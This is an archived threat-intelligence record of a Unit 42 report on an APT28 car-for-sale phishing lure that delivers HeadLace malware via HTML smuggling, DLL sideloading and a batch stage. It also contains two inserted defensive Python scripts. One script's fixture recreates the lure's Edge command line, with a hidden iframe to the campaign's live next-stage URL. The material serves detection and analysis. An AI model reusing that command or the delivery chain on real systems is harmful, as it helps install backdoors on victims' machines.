{
	"id": "fc4a410e-4805-4d57-84e0-251695e240a6",
	"created_at": "2026-04-06T00:18:35.694625Z",
	"updated_at": "2026-04-10T13:11:23.705872Z",
	"deleted_at": null,
	"sha1_hash": "ed08135286f93b1743d796768ac370e2d1a97799",
	"title": "Fighting Ursa Luring Targets With Car for Sale",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2963774,
	"plain_text": "Fighting Ursa Luring Targets With Car for Sale\r\nBy Unit 42\r\nPublished: 2024-08-02 · Archived: 2026-04-05 14:56:21 UTC\r\nExecutive Summary\r\nA Russian threat actor we track as Fighting Ursa advertised a car for sale as a lure to distribute HeadLace\r\nbackdoor malware. The campaign likely targeted diplomats and began as early as March 2024. Fighting Ursa (aka\r\nAPT28, Fancy Bear and Sofacy) has been associated with Russian military intelligence and classified as an\r\nadvanced persistent threat (APT) [PDF].\r\nDiplomatic-car-for-sale phishing lure themes have been used by Russian threat actors for years. These lures tend\r\nto resonate with diplomats and get targets to click on the malicious content.\r\nUnit 42 has previously observed other threat groups using this tactic. For example, in 2023, a different Russian\r\nthreat group, Cloaked Ursa, repurposed an advertisement for a BMW for sale to target diplomatic missions within\r\nUkraine. This campaign is not directly connected to the Fighting Ursa campaign described here. However, the\r\nsimilarity in tactics points to known behaviors of Fighting Ursa. The Fighting Ursa group is known for\r\nrepurposing successful tactics – even continuously exploiting known vulnerabilities for 20 months after their\r\ncover was already blown.\r\nThe details of the March 2024 campaign, which we attribute to Fighting Ursa with a medium to high level of\r\nconfidence, indicate the group targeted diplomats and relied on public and free services to host various stages of\r\nthe attack. 
This article examines the infection chain from the attack.\r\nPalo Alto Networks customers are better protected from the threats discussed in this article through our Network\r\nSecurity solutions, such as Advanced WildFire and Advanced URL Filtering, as well as our Cortex line of\r\nproducts.\r\nIf you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response\r\nteam.\r\nInitial Lure\r\nThe URL kicking off this infection chain was hosted by a legitimate service named Webhook.site, and it was\r\nsubmitted to VirusTotal on March 14, 2024. Webhook.site is a service for legitimate development projects, and it\r\nallows its users to create randomized URLs for various purposes like custom automation based on the\r\ncharacteristics of visitors to the URLs.\r\nIn this case, Fighting Ursa abused Webhook.site to craft a URL that returned a malicious HTML page. Figure 1\r\nbelow shows the HTML returned from the webhook[.]site URL.\r\nhttps://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/\r\nPage 1 of 6\n\nFigure 1. HTML code used in the attack hosted on the Webhook.site service.\r\nThe HTML shown above in Figure 1 has multiple elements that attempt to automate the attack. First, it checks if\r\nthe visiting computer is Windows-based. If not, it redirects to a decoy image on a URL hosted by another\r\nlegitimate provider, which is a free service named ImgBB. As the final payload is Windows-based, this operating\r\nsystem check is probably an effort to ensure that further actions taken in the attack are only taken for Windows\r\nvisitors. The HTML then assembles a ZIP archive in the browser from Base64 text embedded in the page, offers it\r\nfor download and triggers that download automatically by calling the JavaScript click() function on the download\r\nlink, a technique commonly known as HTML smuggling. Because the archive is built client-side, it is never\r\ntransferred as a file object, so network controls that inspect only downloaded files do not see it.\r\nFigure 2 below shows the decoy image advertising a car for sale, specifically an Audi Q7 Quattro SUV. This fake\r\nadvertisement is titled “Diplomatic Car For Sale.”\r\nThe image provides different views of the vehicle. 
The image also contains contact details that are likely fake, as\r\nwell as a phone number based in Romania. Finally, the image also lists the point of contact as the Southeast\r\nEuropean Law Enforcement Center, possibly to lend this fake advertisement more credibility.\r\nFigure 2. Diplomatic car for sale lure hosted on ImgBB.\r\nDownloaded Malware\r\nThe downloaded ZIP archive is saved as IMG-387470302099.zip and contains the three files listed below in Table 1.\r\nFile Size | Modified Date and Time | File Name\r\n918,528 bytes | 2009-07-13 18:38 UTC | IMG-387470302099.jpg.exe\r\n9,728 bytes | 2024-03-13 00:37 UTC | WindowsCodecs.dll\r\n922 bytes | 2024-03-13 00:37 UTC | zqtxmo.bat\r\nTable 1. Contents of the downloaded file IMG-387470302099.zip.\r\nTable 1 above shows that the first file, IMG-387470302099.jpg.exe, has a double file extension of .jpg.exe.\r\nWindows hosts with a default configuration hide known file extensions, so the .jpg.exe file extension only shows\r\nas .jpg in the file name. This is a common tactic used by threat actors to trick potential victims into\r\ndouble-clicking the file, in this case believing it will open a car for sale advertisement.\r\nThe file named IMG-387470302099.jpg.exe is a copy of the legitimate Windows calculator file calc.exe. This file\r\nis used to sideload the included DLL file WindowsCodecs.dll, which is a component of the HeadLace backdoor.\r\nThe sideload works because this build of calc.exe imports WindowsCodecs.dll by name and Windows resolves such\r\nimports from the application's own directory before the system directory, so the attacker's DLL in the ZIP is\r\nloaded in place of the legitimate one. The 2009 timestamp in Table 1 is consistent with the Windows 7 build of\r\ncalc.exe, which the actor ships inside the ZIP rather than relying on the calculator present on the victim's host.\r\nHeadLace is modular malware that executes in stages. This stage-based loading is probably designed to prevent\r\ndetection and minimize the malware's exposure to analysts. The DLL file contains a function shown below in\r\nFigure 3.\r\nFigure 3. Code in WindowsCodecs.dll file to run a file named zqtxmo.bat.\r\nThis function is solely meant to execute the last file within the ZIP archive, zqtxmo.bat. 
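As an added example (not code from Unit 42 or from the report), the following Python triage script checks a ZIP archive for the delivery pattern described above: a double file extension ending in .exe, a DLL carrying a Windows system library name shipped beside the EXE (a sideload candidate), a bundled batch file, and SHA-256 matches against the indicators listed at the end of this article. The archive it inspects is constructed in memory with placeholder bytes; only the file names mirror Table 1, so no hash will match, and the list of sideload-prone DLL names is an assumption to be extended locally.

```python
# Added example (not Unit 42 code): triage a downloaded ZIP for the delivery
# pattern described in the report: a double-extension EXE, a DLL that shadows a
# Windows system library next to it (sideload candidate), a BAT stage, and hash
# matches against the published IoCs. The archive below is CONSTRUCTED in memory
# with placeholder bytes; only the file names mirror Table 1, so no hash matches.
import hashlib
import io
import zipfile

# SHA-256 IoCs quoted from the report.
KNOWN_BAD_SHA256 = {
    'dad1a8869c950c2d1d322c8aed3757d3988ef4f06ba230b329c8d510d8d9a027': 'ZIP archive',
    '6b96b991e33240e5c2091d092079a440fa1bef9b5aecbf3039bf7c47223bdf96': 'WindowsCodecs.dll',
    'a06d74322a8761ec8e6f28d134f2a89c7ba611d920d080a3ccbfac7c3b61e2e7': 'zqtxmo.bat',
}
# ASSUMED list of library names an EXE commonly resolves from its own directory.
SIDELOAD_DLL_NAMES = {'windowscodecs.dll', 'version.dll', 'dwmapi.dll', 'uxtheme.dll'}
EXECUTABLE_EXTS = ('.exe', '.scr', '.com', '.pif')

def is_double_extension(name):
    # True for names like IMG-387470302099.jpg.exe (decoy extension before a real one).
    base = name.rsplit('/', 1)[-1].lower()
    parts = base.split('.')
    return len(parts) >= 3 and ('.' + parts[-1]) in EXECUTABLE_EXTS

def triage_zip(zip_bytes):
    # Return a list of (finding_kind, member_name, note) tuples.
    findings = []
    archive_hash = hashlib.sha256(zip_bytes).hexdigest()
    if archive_hash in KNOWN_BAD_SHA256:
        findings.append(('ioc_match', 'archive', KNOWN_BAD_SHA256[archive_hash]))
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = [i.filename for i in zf.infolist() if not i.is_dir()]
        lower = [n.rsplit('/', 1)[-1].lower() for n in names]
        has_exe = any(n.endswith(EXECUTABLE_EXTS) for n in lower)
        for name, low in zip(names, lower):
            digest = hashlib.sha256(zf.read(name)).hexdigest()
            if digest in KNOWN_BAD_SHA256:
                findings.append(('ioc_match', name, KNOWN_BAD_SHA256[digest]))
            if is_double_extension(name):
                findings.append(('double_extension', name, 'Explorer hides the final .exe by default'))
            if low in SIDELOAD_DLL_NAMES and has_exe:
                findings.append(('sideload_candidate', name, 'system DLL name shipped beside an EXE'))
            if low.endswith(('.bat', '.cmd')):
                findings.append(('script_stage', name, 'batch file bundled with the executable'))
    return findings

def build_sample_zip():
    # CONSTRUCTED stand-in for IMG-387470302099.zip; member contents are placeholders.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('IMG-387470302099.jpg.exe', b'MZ placeholder, not calc.exe')
        zf.writestr('WindowsCodecs.dll', b'MZ placeholder, not the HeadLace DLL')
        zf.writestr('zqtxmo.bat', b'@echo off placeholder')
    return buf.getvalue()

if __name__ == '__main__':
    for kind, name, note in triage_zip(build_sample_zip()):
        print(f'{kind:20} {name:28} {note}')
```

Run against a real sample, the ioc_match findings fire on the archive and member hashes; the three structural findings fire regardless of hash, which is the point of keeping them separate from the indicator list.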
Figure 4 below shows the\r\ncontent of zqtxmo.bat.\r\nFigure 4. Contents of the zqtxmo.bat batch file.\r\nThis batch file starts a process for Microsoft Edge (start msedge) and passes it an HTML document as\r\nBase64-encoded text. As shown above in Figure 4, the decoded text is a hidden iframe that retrieves content from\r\na different Webhook.site URL.\r\nEdge saves the content served by this second Webhook.site URL as IMG387470302099.jpg in the user's\r\ndownloads directory. The batch file then moves the downloaded file into the %programdata% directory and\r\nchanges the file extension from .jpg to .cmd. Finally, the batch file executes IMG387470302099.cmd, then deletes\r\nitself as a way to remove any obvious trace of malicious activity.\r\nAttribution\r\nWe attribute this activity with a medium to high level of confidence to Fighting Ursa based on the tactics,\r\ntechniques and procedures (TTPs), characteristics of the attack infrastructure and the malware family the\r\nattackers used.\r\nThis attack relies heavily on public and free services to host lures and various stages of the attack. Documentation\r\nby IBM, Proofpoint, Recorded Future and others reveals that while the infrastructure used by Fighting Ursa varies\r\nfor different attack campaigns, the group frequently relies on these freely available services. Furthermore, the\r\ntactics from this campaign fit with previously documented Fighting Ursa campaigns, and the HeadLace backdoor\r\nis exclusive to this threat actor.\r\nConclusion\r\nFighting Ursa is a motivated threat actor. The infrastructure the group uses has constantly changed and evolved, as\r\nnoted in a recent report from Recorded Future. Other industry reports have also shown various lures this actor uses\r\nin attempts to drop HeadLace malware.\r\nWe assess that Fighting Ursa will continue to use legitimate web services in its attack infrastructure. 
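Endpoint telemetry still sees the chain even when the hosting service is legitimate. As an added example that is not part of the original report, the Python below hunts process-creation events for the batch-file stage described above: Edge launched with an HTML document passed inline as Base64 text, and that document containing a hidden iframe pointing at the next-stage URL. The event records are constructed; the Sysmon-style field names (Image, CommandLine, ParentImage) and the data:text/html;base64 argument form are assumptions rather than details taken from the report, and the iframe URL is the second Webhook.site indicator from the IoC list.

```python
# Added example (not Unit 42 code): hunt process-creation telemetry for Edge
# launched with inline Base64 HTML, then decode it and pull out iframe targets.
# Events are CONSTRUCTED; the field layout and the data: URL form are assumptions.
import base64
import binascii

INLINE_HTML_MARKER = 'data:text/html;base64,'
QUOTES = (chr(34), chr(39))          # double and single quote characters
HIDDEN_HINTS = ('display:none', 'visibility:hidden')
STAGE_URL = 'https://webhook.site/d290377c-82b5-4765-acb8-454edf6425dd'  # second Webhook.site IoC
EDGE = 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'

def extract_inline_html(command_line):
    # Return the decoded HTML carried in a data:text/html;base64 argument, or None.
    start = command_line.find(INLINE_HTML_MARKER)
    if start < 0:
        return None
    blob = command_line[start + len(INLINE_HTML_MARKER):]
    end = 0
    while end < len(blob) and blob[end] not in QUOTES and not blob[end].isspace():
        end += 1
    blob = blob[:end]
    try:
        raw = base64.b64decode(blob + '=' * (-len(blob) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode('utf-8', 'replace')

def attribute_value(tag, attr):
    # Read one attribute from a single tag; handles quoted and unquoted values.
    key = attr + '='
    i = tag.lower().find(key)
    if i < 0:
        return None
    j = i + len(key)
    if j < len(tag) and tag[j] in QUOTES:
        k = tag.find(tag[j], j + 1)
        return tag[j + 1:k] if k > 0 else None
    k = j
    while k < len(tag) and not tag[k].isspace() and tag[k] != '>':
        k += 1
    return tag[j:k]

def iframe_sources(html):
    # Return [(src, is_hidden)] for every iframe tag in the document.
    found = []
    lower = html.lower()
    pos = lower.find('<iframe')
    while pos >= 0:
        close = lower.find('>', pos)
        if close < 0:
            break
        tag = html[pos:close + 1]
        src = attribute_value(tag, 'src')
        hidden = any(h in tag.lower().replace(' ', '') for h in HIDDEN_HINTS)
        if src:
            found.append((src, hidden))
        pos = lower.find('<iframe', close)
    return found

def hunt(events):
    # Flag msedge.exe launches that carry inline HTML; report parent and iframe targets.
    hits = []
    for ev in events:
        if not ev.get('Image', '').lower().endswith('msedge.exe'):
            continue
        html = extract_inline_html(ev.get('CommandLine', ''))
        if html is None:
            continue
        hits.append({'ParentImage': ev.get('ParentImage'), 'iframes': iframe_sources(html)})
    return hits

def constructed_events():
    # CONSTRUCTED telemetry: one lure-style launch from cmd.exe, two benign-looking ones.
    q = chr(39)
    lure = f'<html><body><iframe src={q}{STAGE_URL}{q} style={q}display: none{q}></iframe></body></html>'
    inline = base64.b64encode(lure.encode()).decode()
    plain = base64.b64encode(b'<p>hello</p>').decode()
    return [
        {'ParentImage': 'C:\\Windows\\System32\\cmd.exe', 'Image': EDGE,
         'CommandLine': f'{EDGE} {INLINE_HTML_MARKER}{inline}'},
        {'ParentImage': 'C:\\Windows\\explorer.exe', 'Image': EDGE,
         'CommandLine': f'{EDGE} https://example.com/'},
        {'ParentImage': 'C:\\Windows\\explorer.exe', 'Image': EDGE,
         'CommandLine': f'{EDGE} {INLINE_HTML_MARKER}{plain}'},
    ]

if __name__ == '__main__':
    for hit in hunt(constructed_events()):
        print(hit)
```

A cmd.exe parent combined with a hidden iframe to a free hosting service is the combination worth alerting on; an inline HTML launch on its own is noisy enough that the decoded iframe targets, not the launch, should drive the triage decision.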
To defend\r\nagainst these attacks, defenders should limit access to these or similar hosting services as necessary. If possible,\r\norganizations should scrutinize the use of these free services to identify possible attack vectors.\r\nPalo Alto Networks Protection and Mitigation\r\nPalo Alto Networks customers are better protected from the threats discussed above through the following\r\nproducts:\r\nCortex XDR detects the attack chain described above, among other protections in the Cortex XDR\r\nplatform.\r\nCortex XSIAM and XSOAR have released a response pack and playbook for automatically detecting the\r\nFighting Ursa threat actor. This playbook downloads the APT28 detection rules and performs extraction,\r\nenrichment, and tagging of indicators. It executes our generic Threat Hunting sub-playbook and\r\nsubsequently provides analysts with recommended workarounds, empowering them to decide the best\r\ncourse of action with the enriched indicators.\r\nAdvanced URL Filtering identifies known URLs associated with this activity as malicious.\r\nThe Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated\r\nin light of the IoCs shared in this research.\r\nIf you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nPalo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA\r\nmembers use this intelligence to rapidly deploy protections to their customers and to systematically disrupt\r\nmalicious cyber actors. 
Learn more about the Cyber Threat Alliance.\r\nIndicators of Compromise\r\nHTML page hosted on Webhook.site with decoy image and payload ZIP file:\r\ncda936ecae566ab871e5c0303d8ff98796b1e3661885afd9d4690fc1e945640e\r\nCar for sale image lure:\r\n7c85ff89b535a39d47756dfce4597c239ee16df88badefe8f76051b836a7cbfb\r\nZIP file containing calc.exe, malicious DLL and BAT file:\r\ndad1a8869c950c2d1d322c8aed3757d3988ef4f06ba230b329c8d510d8d9a027\r\nLegitimate calc.exe abused to sideload the malicious DLL:\r\nc6a91cba00bf87cdb064c49adaac82255cbec6fdd48fd21f9b3b96abf019916b\r\nMalicious file named WindowsCodecs.dll sideloaded by calc.exe:\r\n6b96b991e33240e5c2091d092079a440fa1bef9b5aecbf3039bf7c47223bdf96\r\nBatch file named zqtxmo.bat executed by the above malicious DLL:\r\na06d74322a8761ec8e6f28d134f2a89c7ba611d920d080a3ccbfac7c3b61e2e7\r\nURLs that hosted content for this campaign:\r\nhxxps[:]//webhook[.]site/66d5b9f9-a5eb-48e6-9476-9b6142b0c3ae\r\nhxxps[:]//webhook[.]site/d290377c-82b5-4765-acb8-454edf6425dd\r\nhxxps[:]//i.ibb[.]co/vVSCr2Z/car-for-sale.jpg\r\nSource: https://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/"
	],
	"report_names": [
		"fighting-ursa-car-for-sale-phishing-lure"
	],
	"threat_actors": [
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434715,
	"ts_updated_at": 1775826683,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ed08135286f93b1743d796768ac370e2d1a97799.pdf",
		"text": "https://archive.orkl.eu/ed08135286f93b1743d796768ac370e2d1a97799.txt",
		"img": "https://archive.orkl.eu/ed08135286f93b1743d796768ac370e2d1a97799.jpg"
	}
}